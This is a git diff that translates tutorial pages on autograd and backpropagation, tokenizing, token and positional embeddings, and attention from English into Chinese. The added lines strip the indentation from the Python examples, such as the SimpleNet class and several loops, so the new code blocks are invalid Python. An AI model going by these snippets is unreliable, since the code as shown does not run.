-At the heart of automatic differentiation is the **chain rule** from calculus. The chain rule states that if you have a composition of functions, the derivative of the composite function is the product of the derivatives of the composed functions.
-
-Mathematically, if `y=f(u)` and `u=g(x)`, then the derivative of `y` with respect to `x` is:
+在数学上，如果 `y=f(u)` 且 `u=g(x)`，那么 `y` 关于 `x` 的导数为：
 
 <figure><img src="../../images/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-**2. Computational Graph**
+**2. 计算图**
 
-In AD, computations are represented as nodes in a **computational graph**, where each node corresponds to an operation or a variable. By traversing this graph, we can compute derivatives efficiently.
+在 AD 中，计算被表示为 **计算图** 中的节点，每个节点对应一个操作或变量。通过遍历这个图，我们可以高效地计算导数。
 
-3. Example
+3. 示例
 
-Let's consider a simple function:
+让我们考虑一个简单的函数：
 
 <figure><img src="../../images/image (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-Where:
+其中：
 
-- `σ(z)` is the sigmoid function.
-- `y=1.0` is the target label.
-- `L` is the loss.
+- `σ(z)` 是 sigmoid 函数。
+- `y=1.0` 是目标标签。
+- `L` 是损失。
 
-We want to compute the gradient of the loss `L` with respect to the weight `w` and bias `b`.
+我们想要计算损失 `L` 关于权重 `w` 和偏差 `b` 的梯度。
 
-**4. Computing Gradients Manually**
+**4. 手动计算梯度**
 
 <figure><img src="../../images/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-**5. Numerical Calculation**
+**5. 数值计算**
 
 <figure><img src="../../images/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-### Implementing Automatic Differentiation in PyTorch
-
-Now, let's see how PyTorch automates this process.
+### 在 PyTorch 中实现自动微分
 
+现在，让我们看看 PyTorch 如何自动化这个过程。
 ```python
 pythonCopy codeimport torch
 import torch.nn.functional as F
@@ -199,42 +190,38 @@ loss.backward()
 print("Gradient w.r.t w:", w.grad)
 print("Gradient w.r.t b:", b.grad)
 ```
-
-**Output:**
-
+**输出：**
 ```css
 cssCopy codeGradient w.r.t w: tensor([-0.0898])
 Gradient w.r.t b: tensor([-0.0817])
 ```
+## 在更大神经网络中的反向传播
 
-## Backpropagation in Bigger Neural Networks
+### **1. 扩展到多层网络**
 
-### **1.Extending to Multilayer Networks**
+在具有多个层的大型神经网络中，由于参数和操作数量的增加，计算梯度的过程变得更加复杂。然而，基本原理保持不变：
 
-In larger neural networks with multiple layers, the process of computing gradients becomes more complex due to the increased number of parameters and operations. However, the fundamental principles remain the same:
+- **前向传播：** 通过每一层传递输入来计算网络的输出。
+- **计算损失：** 使用网络的输出和目标标签评估损失函数。
+- **反向传播（Backpropagation）：** 通过从输出层递归应用链式法则，计算损失相对于网络中每个参数的梯度，直到输入层。
 
-- **Forward Pass:** Compute the output of the network by passing inputs through each layer.
-- **Compute Loss:** Evaluate the loss function using the network's output and the target labels.
-- **Backward Pass (Backpropagation):** Compute the gradients of the loss with respect to each parameter in the network by applying the chain rule recursively from the output layer back to the input layer.
+### **2. 反向传播算法**
 
-### **2. Backpropagation Algorithm**
+- **步骤 1：** 初始化网络参数（权重和偏置）。
+- **步骤 2：** 对于每个训练样本，执行前向传播以计算输出。
+- **步骤 3：** 计算损失。
+- **步骤 4：** 使用链式法则计算损失相对于每个参数的梯度。
+- **步骤 5：** 使用优化算法（例如，梯度下降）更新参数。
 
-- **Step 1:** Initialize the network parameters (weights and biases).
-- **Step 2:** For each training example, perform a forward pass to compute the outputs.
-- **Step 3:** Compute the loss.
-- **Step 4:** Compute the gradients of the loss with respect to each parameter using the chain rule.
-- **Step 5:** Update the parameters using an optimization algorithm (e.g., gradient descent).
+### **3. 数学表示**
 
-### **3. Mathematical Representation**
-
-Consider a simple neural network with one hidden layer:
+考虑一个具有一个隐藏层的简单神经网络：
 
 <figure><img src="../../images/image (5) (1).png" alt=""><figcaption></figcaption></figure>
 
-### **4. PyTorch Implementation**
-
-PyTorch simplifies this process with its autograd engine.
+### **4. PyTorch 实现**
 
+PyTorch 通过其自动求导引擎简化了这个过程。
 ```python
 import torch
 import torch.nn as nn
@@ -242,17 +229,17 @@ import torch.optim as optim
 
 # Define a simple neural network
 class SimpleNet(nn.Module):
-    def __init__(self):
-        super(SimpleNet, self).__init__()
-        self.fc1 = nn.Linear(10, 5)  # Input layer to hidden layer
-        self.relu = nn.ReLU()
-        self.fc2 = nn.Linear(5, 1)   # Hidden layer to output layer
-        self.sigmoid = nn.Sigmoid()
+def __init__(self):
+super(SimpleNet, self).__init__()
+self.fc1 = nn.Linear(10, 5)  # Input layer to hidden layer
+self.relu = nn.ReLU()
+self.fc2 = nn.Linear(5, 1)   # Hidden layer to output layer
+self.sigmoid = nn.Sigmoid()
 
-    def forward(self, x):
-        h = self.relu(self.fc1(x))
-        y_hat = self.sigmoid(self.fc2(h))
-        return y_hat
+def forward(self, x):
+h = self.relu(self.fc1(x))
+y_hat = self.sigmoid(self.fc2(h))
+return y_hat
 
 # Instantiate the network
 net = SimpleNet()
@@ -274,27 +261,25 @@ optimizer.step()               # Update parameters
 
 # Accessing gradients
 for name, param in net.named_parameters():
-    if param.requires_grad:
-        print(f"Gradient of {name}: {param.grad}")
+if param.requires_grad:
+print(f"Gradient of {name}: {param.grad}")
 ```
+在这段代码中：
 
-In this code:
+- **前向传播：** 计算网络的输出。
+- **反向传播：** `loss.backward()` 计算损失相对于所有参数的梯度。
+- **参数更新：** `optimizer.step()` 根据计算出的梯度更新参数。
 
-- **Forward Pass:** Computes the outputs of the network.
-- **Backward Pass:** `loss.backward()` computes the gradients of the loss with respect to all parameters.
-- **Parameter Update:** `optimizer.step()` updates the parameters based on the computed gradients.
+### **5. 理解反向传播**
 
-### **5. Understanding Backward Pass**
+在反向传播过程中：
 
-During the backward pass:
+- PyTorch 以相反的顺序遍历计算图。
+- 对于每个操作，它应用链式法则来计算梯度。
+- 梯度被累积在每个参数张量的 `.grad` 属性中。
 
-- PyTorch traverses the computational graph in reverse order.
-- For each operation, it applies the chain rule to compute gradients.
-- Gradients are accumulated in the `.grad` attribute of each parameter tensor.
-
-### **6. Advantages of Automatic Differentiation**
-
-- **Efficiency:** Avoids redundant calculations by reusing intermediate results.
-- **Accuracy:** Provides exact derivatives up to machine precision.
-- **Ease of Use:** Eliminates manual computation of derivatives.
+### **6. 自动微分的优点**
 
+- **效率：** 通过重用中间结果避免冗余计算。
+- **准确性：** 提供精确的导数，达到机器精度。
+- **易用性：** 消除了手动计算导数的需要。
diff --git a/src/todo/llm-training-data-preparation/1.-tokenizing.md b/src/todo/llm-training-data-preparation/1.-tokenizing.md
index 454605faa..c4940bc8e 100644
--- a/src/todo/llm-training-data-preparation/1.-tokenizing.md
+++ b/src/todo/llm-training-data-preparation/1.-tokenizing.md
@@ -1,78 +1,77 @@
-# 1. Tokenizing
+# 1. 分词
 
-## Tokenizing
+## 分词
 
-**Tokenizing** is the process of breaking down data, such as text, into smaller, manageable pieces called _tokens_. Each token is then assigned a unique numerical identifier (ID). This is a fundamental step in preparing text for processing by machine learning models, especially in natural language processing (NLP).
+**分词**是将数据（如文本）拆分成更小、可管理的部分，称为_标记_的过程。每个标记都被分配一个唯一的数字标识符（ID）。这是为机器学习模型处理文本做准备的基本步骤，特别是在自然语言处理（NLP）中。
 
 > [!TIP]
-> The goal of this initial phase is very simple: **Divide the input in tokens (ids) in some way that makes sense**.
+> 这个初始阶段的目标非常简单：**以某种合理的方式将输入分成标记（ID）**。
 
-### **How Tokenizing Works**
+### **分词的工作原理**
 
-1. **Splitting the Text:**
-   - **Basic Tokenizer:** A simple tokenizer might split text into individual words and punctuation marks, removing spaces.
-     - _Example:_\
-       Text: `"Hello, world!"`\
-       Tokens: `["Hello", ",", "world", "!"]`
-2. **Creating a Vocabulary:**
-   - To convert tokens into numerical IDs, a **vocabulary** is created. This vocabulary lists all unique tokens (words and symbols) and assigns each a specific ID.
-   - **Special Tokens:** These are special symbols added to the vocabulary to handle various scenarios:
-     - `[BOS]` (Beginning of Sequence): Indicates the start of a text.
-     - `[EOS]` (End of Sequence): Indicates the end of a text.
-     - `[PAD]` (Padding): Used to make all sequences in a batch the same length.
-     - `[UNK]` (Unknown): Represents tokens that are not in the vocabulary.
-   - _Example:_\
-     If `"Hello"` is assigned ID `64`, `","` is `455`, `"world"` is `78`, and `"!"` is `467`, then:\
-     `"Hello, world!"` → `[64, 455, 78, 467]`
-   - **Handling Unknown Words:**\
-     If a word like `"Bye"` isn't in the vocabulary, it is replaced with `[UNK]`.\
-     `"Bye, world!"` → `["[UNK]", ",", "world", "!"]` → `[987, 455, 78, 467]`\
-     &#xNAN;_(Assuming `[UNK]` has ID `987`)_
+1. **拆分文本：**
+- **基本分词器：** 一个简单的分词器可能将文本拆分为单个单词和标点符号，去除空格。
+- _示例:_\
+文本：`"Hello, world!"`\
+标记：`["Hello", ",", "world", "!"]`
+2. **创建词汇表：**
+- 为了将标记转换为数字ID，创建一个**词汇表**。这个词汇表列出所有唯一的标记（单词和符号），并为每个标记分配一个特定的ID。
+- **特殊标记：** 这些是添加到词汇表中的特殊符号，以处理各种场景：
+- `[BOS]`（序列开始）：表示文本的开始。
+- `[EOS]`（序列结束）：表示文本的结束。
+- `[PAD]`（填充）：用于使批次中的所有序列具有相同的长度。
+- `[UNK]`（未知）：表示不在词汇表中的标记。
+- _示例:_\
+如果`"Hello"`被分配ID `64`，`","`是`455`，`"world"`是`78`，`"!"`是`467`，那么：\
+`"Hello, world!"` → `[64, 455, 78, 467]`
+- **处理未知单词：**\
+如果像`"Bye"`这样的单词不在词汇表中，它将被替换为`[UNK]`。\
+`"Bye, world!"` → `["[UNK]", ",", "world", "!"]` → `[987, 455, 78, 467]`\
+&#xNAN;_(假设`[UNK]`的ID是`987`)_
 
-### **Advanced Tokenizing Methods**
+### **高级分词方法**
 
-While the basic tokenizer works well for simple texts, it has limitations, especially with large vocabularies and handling new or rare words. Advanced tokenizing methods address these issues by breaking text into smaller subunits or optimizing the tokenization process.
+虽然基本分词器适用于简单文本，但在处理大词汇表和新或稀有单词时存在局限性。高级分词方法通过将文本拆分为更小的子单元或优化分词过程来解决这些问题。
 
-1. **Byte Pair Encoding (BPE):**
-   - **Purpose:** Reduces the size of the vocabulary and handles rare or unknown words by breaking them down into frequently occurring byte pairs.
-   - **How It Works:**
-     - Starts with individual characters as tokens.
-     - Iteratively merges the most frequent pairs of tokens into a single token.
-     - Continues until no more frequent pairs can be merged.
-   - **Benefits:**
-     - Eliminates the need for an `[UNK]` token since all words can be represented by combining existing subword tokens.
-     - More efficient and flexible vocabulary.
-   - _Example:_\
-     `"playing"` might be tokenized as `["play", "ing"]` if `"play"` and `"ing"` are frequent subwords.
-2. **WordPiece:**
-   - **Used By:** Models like BERT.
-   - **Purpose:** Similar to BPE, it breaks words into subword units to handle unknown words and reduce vocabulary size.
-   - **How It Works:**
-     - Begins with a base vocabulary of individual characters.
-     - Iteratively adds the most frequent subword that maximizes the likelihood of the training data.
-     - Uses a probabilistic model to decide which subwords to merge.
-   - **Benefits:**
-     - Balances between having a manageable vocabulary size and effectively representing words.
-     - Efficiently handles rare and compound words.
-   - _Example:_\
-     `"unhappiness"` might be tokenized as `["un", "happiness"]` or `["un", "happy", "ness"]` depending on the vocabulary.
-3. **Unigram Language Model:**
-   - **Used By:** Models like SentencePiece.
-   - **Purpose:** Uses a probabilistic model to determine the most likely set of subword tokens.
-   - **How It Works:**
-     - Starts with a large set of potential tokens.
-     - Iteratively removes tokens that least improve the model's probability of the training data.
-     - Finalizes a vocabulary where each word is represented by the most probable subword units.
-   - **Benefits:**
-     - Flexible and can model language more naturally.
-     - Often results in more efficient and compact tokenizations.
-   - _Example:_\
-     `"internationalization"` might be tokenized into smaller, meaningful subwords like `["international", "ization"]`.
+1. **字节对编码（BPE）：**
+- **目的：** 通过将稀有或未知单词拆分为频繁出现的字节对，减少词汇表的大小并处理稀有或未知单词。
+- **工作原理：**
+- 从单个字符作为标记开始。
+- 迭代地将最频繁的标记对合并为一个标记。
+- 继续直到没有更多频繁的标记对可以合并。
+- **好处：**
+- 消除了对`[UNK]`标记的需求，因为所有单词都可以通过组合现有的子词标记来表示。
+- 更高效和灵活的词汇表。
+- _示例:_\
+`"playing"`可能被标记为`["play", "ing"]`，如果`"play"`和`"ing"`是频繁的子词。
+2. **WordPiece：**
+- **使用者：** 像BERT这样的模型。
+- **目的：** 类似于BPE，它将单词拆分为子词单元，以处理未知单词并减少词汇表大小。
+- **工作原理：**
+- 从单个字符的基本词汇表开始。
+- 迭代地添加最频繁的子词，以最大化训练数据的可能性。
+- 使用概率模型决定合并哪些子词。
+- **好处：**
+- 在拥有可管理的词汇表大小和有效表示单词之间取得平衡。
+- 高效处理稀有和复合单词。
+- _示例:_\
+`"unhappiness"`可能被标记为`["un", "happiness"]`或`["un", "happy", "ness"]`，具体取决于词汇表。
+3. **单元语言模型：**
+- **使用者：** 像SentencePiece这样的模型。
+- **目的：** 使用概率模型确定最可能的子词标记集。
+- **工作原理：**
+- 从一组潜在标记开始。
+- 迭代地移除那些对模型的训练数据概率改善最小的标记。
+- 最终确定一个词汇表，其中每个单词由最可能的子词单元表示。
+- **好处：**
+- 灵活，可以更自然地建模语言。
+- 通常会导致更高效和紧凑的标记化。
+- _示例:_\
+`"internationalization"`可能被标记为更小的、有意义的子词，如`["international", "ization"]`。
 
-## Code Example
-
-Let's understand this better from a code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
+## 代码示例
 
+让我们通过来自[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb)的代码示例更好地理解这一点：
 ```python
 # Download a text to pre-train the model
 import urllib.request
@@ -81,7 +80,7 @@ file_path = "the-verdict.txt"
 urllib.request.urlretrieve(url, file_path)
 
 with open("the-verdict.txt", "r", encoding="utf-8") as f:
-    raw_text = f.read()
+raw_text = f.read()
 
 # Tokenize the code using GPT2 tokenizer version
 import tiktoken
@@ -91,8 +90,6 @@ token_ids = tiktoken.get_encoding("gpt2").encode(txt, allowed_special={"[EOS]"})
 print(token_ids[:50])
 #[40, 367, 2885, 1464, 1807, 3619, 402, 271, 10899, 2138, 257, 7026, 15632, 438, 2016, 257, 922, 5891, 1576, 438, 568, 340, 373, 645, 1049, 5975, 284, 502, 284, 3285, 326, 11, 287, 262, 6001, 286, 465, 13476, 11, 339, 550, 5710, 465, 12036, 11, 6405, 257, 5527, 27075, 11]
 ```
-
-## References
+## 参考文献
 
 - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
-
diff --git a/src/todo/llm-training-data-preparation/3.-token-embeddings.md b/src/todo/llm-training-data-preparation/3.-token-embeddings.md
index 7db973e25..7518b8850 100644
--- a/src/todo/llm-training-data-preparation/3.-token-embeddings.md
+++ b/src/todo/llm-training-data-preparation/3.-token-embeddings.md
@@ -2,20 +2,20 @@
 
 ## Token Embeddings
 
-After tokenizing text data, the next critical step in preparing data for training large language models (LLMs) like GPT is creating **token embeddings**. Token embeddings transform discrete tokens (such as words or subwords) into continuous numerical vectors that the model can process and learn from. This explanation breaks down token embeddings, their initialization, usage, and the role of positional embeddings in enhancing model understanding of token sequences.
+在对文本数据进行分词后，为像 GPT 这样的训练大型语言模型（LLMs）准备数据的下一个关键步骤是创建 **token embeddings**。Token embeddings 将离散的标记（如单词或子词）转换为模型可以处理和学习的连续数值向量。此解释分解了 token embeddings、它们的初始化、使用以及位置嵌入在增强模型对标记序列理解中的作用。
 
 > [!TIP]
-> The goal of this third phase is very simple: **Assign each of the previous tokens in the vocabulary a vector of the desired dimensions to train the model.** Each word in the vocabulary will a point in a space of X dimensions.\
-> Note that initially the position of each word in the space is just initialised "randomly" and these positions are trainable parameters (will be improved during the training).
+> 这个第三阶段的目标非常简单：**为词汇表中每个先前的标记分配一个所需维度的向量以训练模型。** 词汇表中的每个单词将在 X 维空间中有一个点。\
+> 请注意，最初每个单词在空间中的位置只是“随机”初始化，这些位置是可训练的参数（将在训练过程中改进）。
 >
-> Moreover, during the token embedding **another layer of embeddings is created** which represents (in this case) the **absolute possition of the word in the training sentence**. This way a word in different positions in the sentence will have a different representation (meaning).
+> 此外，在 token embedding 过程中 **创建了另一层嵌入**，它表示（在这种情况下）**单词在训练句子中的绝对位置**。这样，句子中不同位置的单词将具有不同的表示（含义）。
 
 ### **What Are Token Embeddings?**
 
-**Token Embeddings** are numerical representations of tokens in a continuous vector space. Each token in the vocabulary is associated with a unique vector of fixed dimensions. These vectors capture semantic and syntactic information about the tokens, enabling the model to understand relationships and patterns in the data.
+**Token Embeddings** 是在连续向量空间中对标记的数值表示。词汇表中的每个标记都与一个固定维度的唯一向量相关联。这些向量捕捉了关于标记的语义和句法信息，使模型能够理解数据中的关系和模式。
 
-- **Vocabulary Size:** The total number of unique tokens (e.g., words, subwords) in the model’s vocabulary.
-- **Embedding Dimensions:** The number of numerical values (dimensions) in each token’s vector. Higher dimensions can capture more nuanced information but require more computational resources.
+- **Vocabulary Size:** 模型词汇表中唯一标记的总数（例如，单词、子词）。
+- **Embedding Dimensions:** 每个标记向量中的数值（维度）数量。更高的维度可以捕捉更细微的信息，但需要更多的计算资源。
 
 **Example:**
 
@@ -24,10 +24,9 @@ After tokenizing text data, the next critical step in preparing data for trainin
 
 ### **Initializing Token Embeddings**
 
-At the start of training, token embeddings are typically initialized with small random values. These initial values are adjusted (fine-tuned) during training to better represent the tokens' meanings based on the training data.
+在训练开始时，token embeddings 通常用小的随机值初始化。这些初始值在训练过程中进行调整（微调），以更好地表示基于训练数据的标记含义。
 
 **PyTorch Example:**
-
 ```python
 import torch
 
@@ -40,61 +39,53 @@ embedding_layer = torch.nn.Embedding(6, 3)
 # Display the initial weights (embeddings)
 print(embedding_layer.weight)
 ```
-
-**Output:**
-
+**输出：**
 ```lua
 luaCopy codeParameter containing:
 tensor([[ 0.3374, -0.1778, -0.1690],
-        [ 0.9178,  1.5810,  1.3010],
-        [ 1.2753, -0.2010, -0.1606],
-        [-0.4015,  0.9666, -1.1481],
-        [-1.1589,  0.3255, -0.6315],
-        [-2.8400, -0.7849, -1.4096]], requires_grad=True)
+[ 0.9178,  1.5810,  1.3010],
+[ 1.2753, -0.2010, -0.1606],
+[-0.4015,  0.9666, -1.1481],
+[-1.1589,  0.3255, -0.6315],
+[-2.8400, -0.7849, -1.4096]], requires_grad=True)
 ```
+**解释：**
 
-**Explanation:**
-
-- Each row corresponds to a token in the vocabulary.
-- Each column represents a dimension in the embedding vector.
-- For example, the token at index `3` has an embedding vector `[-0.4015, 0.9666, -1.1481]`.
-
-**Accessing a Token’s Embedding:**
+- 每一行对应词汇表中的一个标记。
+- 每一列表示嵌入向量中的一个维度。
+- 例如，索引为 `3` 的标记具有嵌入向量 `[-0.4015, 0.9666, -1.1481]`。
 
+**访问标记的嵌入：**
 ```python
 # Retrieve the embedding for the token at index 3
 token_index = torch.tensor([3])
 print(embedding_layer(token_index))
 ```
-
-**Output:**
-
+**输出：**
 ```lua
 tensor([[-0.4015,  0.9666, -1.1481]], grad_fn=<EmbeddingBackward0>)
 ```
+**解释：**
 
-**Interpretation:**
+- 索引为 `3` 的标记由向量 `[-0.4015, 0.9666, -1.1481]` 表示。
+- 这些值是可训练的参数，模型将在训练过程中调整这些参数，以更好地表示标记的上下文和含义。
 
-- The token at index `3` is represented by the vector `[-0.4015, 0.9666, -1.1481]`.
-- These values are trainable parameters that the model will adjust during training to better represent the token's context and meaning.
+### **标记嵌入在训练中的工作原理**
 
-### **How Token Embeddings Work During Training**
+在训练过程中，输入数据中的每个标记都被转换为其对应的嵌入向量。这些向量随后用于模型内的各种计算，例如注意力机制和神经网络层。
 
-During training, each token in the input data is converted into its corresponding embedding vector. These vectors are then used in various computations within the model, such as attention mechanisms and neural network layers.
+**示例场景：**
 
-**Example Scenario:**
+- **批量大小：** 8（同时处理的样本数量）
+- **最大序列长度：** 4（每个样本的标记数量）
+- **嵌入维度：** 256
 
-- **Batch Size:** 8 (number of samples processed simultaneously)
-- **Max Sequence Length:** 4 (number of tokens per sample)
-- **Embedding Dimensions:** 256
+**数据结构：**
 
-**Data Structure:**
-
-- Each batch is represented as a 3D tensor with shape `(batch_size, max_length, embedding_dim)`.
-- For our example, the shape would be `(8, 4, 256)`.
-
-**Visualization:**
+- 每个批次表示为形状为 `(batch_size, max_length, embedding_dim)` 的 3D 张量。
+- 对于我们的示例，形状将是 `(8, 4, 256)`。
 
+**可视化：**
 ```css
 cssCopy codeBatch
 ┌─────────────┐
@@ -125,56 +116,52 @@ cssCopy codeBatch
 │ └─────┘     │
 └─────────────┘
 ```
+**解释：**
 
-**Explanation:**
+- 序列中的每个标记由一个256维的向量表示。
+- 模型处理这些嵌入以学习语言模式并生成预测。
 
-- Each token in the sequence is represented by a 256-dimensional vector.
-- The model processes these embeddings to learn language patterns and generate predictions.
+## **位置嵌入：为标记嵌入添加上下文**
 
-## **Positional Embeddings: Adding Context to Token Embeddings**
+虽然标记嵌入捕捉了单个标记的含义，但它们并不固有地编码标记在序列中的位置。理解标记的顺序对于语言理解至关重要。这就是**位置嵌入**发挥作用的地方。
 
-While token embeddings capture the meaning of individual tokens, they do not inherently encode the position of tokens within a sequence. Understanding the order of tokens is crucial for language comprehension. This is where **positional embeddings** come into play.
+### **为什么需要位置嵌入：**
 
-### **Why Positional Embeddings Are Needed:**
+- **标记顺序很重要：** 在句子中，意义往往依赖于单词的顺序。例如，“猫坐在垫子上”与“垫子坐在猫上”。
+- **嵌入限制：** 如果没有位置信息，模型将标记视为“词袋”，忽略它们的顺序。
 
-- **Token Order Matters:** In sentences, the meaning often depends on the order of words. For example, "The cat sat on the mat" vs. "The mat sat on the cat."
-- **Embedding Limitation:** Without positional information, the model treats tokens as a "bag of words," ignoring their sequence.
+### **位置嵌入的类型：**
 
-### **Types of Positional Embeddings:**
+1. **绝对位置嵌入：**
+- 为序列中的每个位置分配一个唯一的位置向量。
+- **示例：** 任何序列中的第一个标记具有相同的位置嵌入，第二个标记具有另一个，以此类推。
+- **使用者：** OpenAI的GPT模型。
+2. **相对位置嵌入：**
+- 编码标记之间的相对距离，而不是它们的绝对位置。
+- **示例：** 指示两个标记之间的距离，无论它们在序列中的绝对位置如何。
+- **使用者：** 像Transformer-XL和一些BERT变体的模型。
 
-1. **Absolute Positional Embeddings:**
-   - Assign a unique position vector to each position in the sequence.
-   - **Example:** The first token in any sequence has the same positional embedding, the second token has another, and so on.
-   - **Used By:** OpenAI’s GPT models.
-2. **Relative Positional Embeddings:**
-   - Encode the relative distance between tokens rather than their absolute positions.
-   - **Example:** Indicate how far apart two tokens are, regardless of their absolute positions in the sequence.
-   - **Used By:** Models like Transformer-XL and some variants of BERT.
+### **位置嵌入的集成方式：**
 
-### **How Positional Embeddings Are Integrated:**
+- **相同维度：** 位置嵌入与标记嵌入具有相同的维度。
+- **相加：** 它们被添加到标记嵌入中，将标记身份与位置信息结合，而不增加整体维度。
 
-- **Same Dimensions:** Positional embeddings have the same dimensionality as token embeddings.
-- **Addition:** They are added to token embeddings, combining token identity with positional information without increasing the overall dimensionality.
-
-**Example of Adding Positional Embeddings:**
-
-Suppose a token embedding vector is `[0.5, -0.2, 0.1]` and its positional embedding vector is `[0.1, 0.3, -0.1]`. The combined embedding used by the model would be:
+**位置嵌入相加的示例：**
 
+假设一个标记嵌入向量是`[0.5, -0.2, 0.1]`，其位置嵌入向量是`[0.1, 0.3, -0.1]`。模型使用的组合嵌入将是：
 ```css
 Combined Embedding = Token Embedding + Positional Embedding
-                   = [0.5 + 0.1, -0.2 + 0.3, 0.1 + (-0.1)]
-                   = [0.6, 0.1, 0.0]
+= [0.5 + 0.1, -0.2 + 0.3, 0.1 + (-0.1)]
+= [0.6, 0.1, 0.0]
 ```
+**位置嵌入的好处：**
 
-**Benefits of Positional Embeddings:**
+- **上下文意识：** 模型可以根据位置区分标记。
+- **序列理解：** 使模型能够理解语法、句法和上下文相关的含义。
 
-- **Contextual Awareness:** The model can differentiate between tokens based on their positions.
-- **Sequence Understanding:** Enables the model to understand grammar, syntax, and context-dependent meanings.
-
-## Code Example
-
-Following with the code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
+## 代码示例
 
+以下是来自 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb) 的代码示例：
 ```python
 # Use previous code...
 
@@ -191,8 +178,8 @@ token_embedding_layer = torch.nn.Embedding(vocab_size, output_dim)
 ## Generate the dataloader like before
 max_length = 4
 dataloader = create_dataloader_v1(
-    raw_text, batch_size=8, max_length=max_length,
-    stride=max_length, shuffle=False
+raw_text, batch_size=8, max_length=max_length,
+stride=max_length, shuffle=False
 )
 data_iter = iter(dataloader)
 inputs, targets = next(data_iter)
@@ -211,8 +198,6 @@ pos_embeddings = pos_embedding_layer(torch.arange(max_length))
 input_embeddings = token_embeddings + pos_embeddings
 print(input_embeddings.shape) # torch.Size([8, 4, 256])
 ```
-
-## References
+## 参考文献
 
 - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
-
diff --git a/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md b/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md
index 86c81104c..8b6940d94 100644
--- a/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md
+++ b/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md
@@ -1,143 +1,142 @@
-# 4. Attention Mechanisms
+# 4. 注意机制
 
-## Attention Mechanisms and Self-Attention in Neural Networks
+## 神经网络中的注意机制和自注意力
 
-Attention mechanisms allow neural networks to f**ocus on specific parts of the input when generating each part of the output**. They assign different weights to different inputs, helping the model decide which inputs are most relevant to the task at hand. This is crucial in tasks like machine translation, where understanding the context of the entire sentence is necessary for accurate translation.
+注意机制允许神经网络在生成输出的每个部分时**专注于输入的特定部分**。它们为不同的输入分配不同的权重，帮助模型决定哪些输入与当前任务最相关。这在机器翻译等任务中至关重要，因为理解整个句子的上下文对于准确翻译是必要的。
 
 > [!TIP]
-> The goal of this fourth phase is very simple: **Apply some attetion mechanisms**. These are going to be a lot of **repeated layers** that are going to **capture the relation of a word in the vocabulary with its neighbours in the current sentence being used to train the LLM**.\
-> A lot of layers are used for this, so a lot of trainable parameters are going to be capturing this information.
+> 这个第四阶段的目标非常简单：**应用一些注意机制**。这些将是许多**重复的层**，将**捕捉词汇中一个词与当前用于训练LLM的句子中其邻居的关系**。\
+> 为此使用了很多层，因此将有很多可训练的参数来捕捉这些信息。
 
-### Understanding Attention Mechanisms
+### 理解注意机制
 
-In traditional sequence-to-sequence models used for language translation, the model encodes an input sequence into a fixed-size context vector. However, this approach struggles with long sentences because the fixed-size context vector may not capture all necessary information. Attention mechanisms address this limitation by allowing the model to consider all input tokens when generating each output token.
+在用于语言翻译的传统序列到序列模型中，模型将输入序列编码为固定大小的上下文向量。然而，这种方法在处理长句子时会遇到困难，因为固定大小的上下文向量可能无法捕捉所有必要的信息。注意机制通过允许模型在生成每个输出标记时考虑所有输入标记来解决这一限制。
 
-#### Example: Machine Translation
+#### 示例：机器翻译
 
-Consider translating the German sentence "Kannst du mir helfen diesen Satz zu übersetzen" into English. A word-by-word translation would not produce a grammatically correct English sentence due to differences in grammatical structures between languages. An attention mechanism enables the model to focus on relevant parts of the input sentence when generating each word of the output sentence, leading to a more accurate and coherent translation.
+考虑将德语句子 "Kannst du mir helfen diesen Satz zu übersetzen" 翻译成英语。逐字翻译不会产生语法正确的英语句子，因为不同语言之间的语法结构存在差异。注意机制使模型能够在生成输出句子的每个单词时专注于输入句子的相关部分，从而导致更准确和连贯的翻译。
 
-### Introduction to Self-Attention
+### 自注意力介绍
 
-Self-attention, or intra-attention, is a mechanism where attention is applied within a single sequence to compute a representation of that sequence. It allows each token in the sequence to attend to all other tokens, helping the model capture dependencies between tokens regardless of their distance in the sequence.
+自注意力，或称为内部注意力，是一种机制，其中注意力在单个序列内应用，以计算该序列的表示。它允许序列中的每个标记关注所有其他标记，帮助模型捕捉标记之间的依赖关系，而不管它们在序列中的距离。
 
-#### Key Concepts
+#### 关键概念
 
-- **Tokens**: Individual elements of the input sequence (e.g., words in a sentence).
-- **Embeddings**: Vector representations of tokens, capturing semantic information.
-- **Attention Weights**: Values that determine the importance of each token relative to others.
+- **标记**：输入序列的单个元素（例如，句子中的单词）。
+- **嵌入**：标记的向量表示，捕捉语义信息。
+- **注意权重**：确定每个标记相对于其他标记重要性的值。
 
-### Calculating Attention Weights: A Step-by-Step Example
+### 计算注意权重：逐步示例
 
-Let's consider the sentence **"Hello shiny sun!"** and represent each word with a 3-dimensional embedding:
+让我们考虑句子 **"Hello shiny sun!"** 并用3维嵌入表示每个单词：
 
 - **Hello**: `[0.34, 0.22, 0.54]`
 - **shiny**: `[0.53, 0.34, 0.98]`
 - **sun**: `[0.29, 0.54, 0.93]`
 
-Our goal is to compute the **context vector** for the word **"shiny"** using self-attention.
+我们的目标是使用自注意力计算**"shiny"**的**上下文向量**。
 
-#### Step 1: Compute Attention Scores
+#### 步骤1：计算注意分数
 
 > [!TIP]
-> Just multiply each dimension value of the query with the relevant one of each token and add the results. You get 1 value per pair of tokens.
